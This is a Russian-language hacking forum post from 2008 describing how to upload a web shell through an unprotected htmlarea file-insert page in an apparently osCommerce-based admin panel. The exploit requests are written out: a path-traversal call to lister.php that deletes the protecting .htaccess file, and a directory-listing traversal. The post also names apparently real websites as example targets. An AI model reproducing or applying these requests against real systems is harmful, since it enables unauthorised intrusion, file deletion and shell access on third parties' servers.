22.05.2008, 05:33
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Версия х3, какой мод стоит тоже х3) найдено 28.06.2007
Код:
http://localhost/os/admin/htmlarea/popups/file/insert_file.php
заливаем наш шелл. по дефолту он заливается в папку download в корне, НО нам мешает .htaccess с содержанием
Код:
AuthType Basic
AuthName "No access"
AuthUserFile .htnopasswd
AuthGroupFile /dev/null
Require valid-user
файл .htnopasswd как таковой вообще отсутствует и авторизация невозможна.
поэтому заходим на
Код:
http://localhost/os/admin/htmlarea/popups/lister.php?DPI=96&action=delete&path=&file=../download/.htaccess
и нагло сносим зловредный файл)
Код:
http://www.site.ro/admin/htmlarea/popups/file/files.php?dir=/../
Листинг.
Примеры
http://www.sex-toysuk.com/admin/htmlarea/popups/file/insert_file.php
http://www.copilasultau.ro/admin/htmlarea/popups/file/files.php?dir=/../../
__________________
|
|
|